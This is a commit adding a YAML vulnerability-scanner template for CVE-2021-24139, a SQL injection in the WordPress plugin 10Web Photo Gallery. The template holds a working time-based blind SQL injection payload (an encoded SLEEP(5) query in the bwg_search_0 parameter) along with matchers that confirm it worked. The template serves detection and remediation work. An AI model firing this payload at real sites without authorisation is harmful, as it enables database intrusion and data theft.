Merge pull request #15083 from riteshs4hu/CVE-2021-24139

Add CVE-2021-24139
2026-01-31 15:53:33 +08:00 · 2026-01-29 13:54:54 +05:30
parent 7e97f8477c 5f17582f29
commit 27d62d77f2
1 changed files with 59 additions and 0 deletions
--- a/http/cves/2021/CVE-2021-24139.yaml
+++ b/http/cves/2021/CVE-2021-24139.yaml
@@ -0,0 +1,59 @@
+id: CVE-2021-24139
+
+info:
+  name: 10Web Photo Gallery < 1.5.55 - SQL Injection
+  author: riteshs4hu
+  severity: critical
+  description: |
+    WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.
+  impact: |
+    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
+  remediation: |
+    Update to version 1.5.55 or later.
+  reference:
+    - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24139
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24139
+    cwe-id: CWE-89
+    epss-score: 0.00546
+    epss-percentile: 0.67189
+    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: 10web
+    product: photo_gallery
+    publicwww-query: "bwg_container"
+  tags: cve,cve2021,wp,wp-plugin,sqli,photo-gallery,10web
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: slug
+        group: 1
+        regex:
+          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 50s
+        GET /{{slug}}/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code==200'